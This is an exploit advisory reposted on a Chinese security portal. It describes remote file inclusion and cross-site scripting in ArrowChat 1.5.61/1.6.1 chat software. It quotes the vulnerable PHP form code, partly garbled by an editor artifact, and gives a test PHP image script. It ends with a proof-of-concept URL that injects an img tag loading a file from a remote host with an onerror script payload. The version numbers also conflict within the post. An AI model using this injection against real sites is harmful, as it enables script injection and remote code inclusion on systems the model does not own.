首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
ArrowChat 1.5.61 RFI Vulnerability
来源:vfocus.net 作者:Euforia33 发布时间:2013-02-22  
// RFI Vulnerability in ArrowChat 1.6.1
// RFI PHP Image coded by Euforia33, 21/02/2013.
// Known vulnerable versions (1.6.1 and below) 

In addition to the XSS and LFI vulnerabilities in ArrowChat 1.5.61 as pointed out by
Kallimero (http://packetstormsecurity.com/files/119999/ArrowChat-1.5.61-Cross-
Site-Scripting-Local-File-Inclusion.html), You can also include remote PHP files by
exploiting the same piece of code:

<form method="post" action="<?php echo 
___FCKpd___0
SERVER['PHP_SELF']; ?>?do=<?php echo $do; ?>" enctype="multipart/form-data"> By using image headers, it is possible to include remote PHP files directly onto the page through the IMG tags. The onerror is used to show a way to inject XSS without the need of the script tags, which are often filtered out. If you wanted to use the XSS instead of the RFI, simply point the img src to a location that does not exist it will return the error that we have choses which in this case is the XSS injection. Here's a sample image, rendered in PHP for the purpose of checking if RFI is possible: <?php # Strings to display in the image, includes a shuffle for testing functionality of the code $maintxt = "RFI Vulnerability Test"; $exetest = "Packet Storm"; $exetest2 = str_shuffle($exetest); $im = imagecreatetruecolor(350, 120); $bg = ImageColorAllocate($im,0x00,0x00,0x00); $txt = imagecolorallocate($im, 85, 85, 85); imagefilledrectangle($im, 0, 0, 350, 120, $bg); imagettftext($im, 17, 0, 20, 35, -$txt, 'Arial.ttf', "{$maintxt}"); imagettftext($im, 11, 0, 125, 70, -$txt, 'Arial.ttf', "{$exetest}"); imagettftext($im, 11, 0, 125, 90, -$txt, 'Arial.ttf', "{$exetest2}"); # Sending image header header('Content-type: image/png'); imagepng($im); imagedestroy($im); ?> PoC: http://[domain.name]/[pathtoArrowChat]/admin/layout/pages_general.php/'"/><img src="http://[remote.domain.name]/Image.php" onerror=alert(33);> Euforia33.

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·OpenEMR PHP File Upload
·TeamViwer V8.0.16642 Insecure
·BigAnt Server 2 SCH And DUPF B
·Photodex ProShow Producer 5.0.
·BigAnt Server DUPF Command Arb
·MS Office 2010 Download Execut
·Windows Manage User Level Pers
·Joomla <=2.5.8,<=3.0.2 remote
·Photodex ProShow Producer v5.0
·Microsoft Windows XP Professio
·Photodex ProShow Producer 5.0.
·Java Applet JMX Remote Code Ex
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved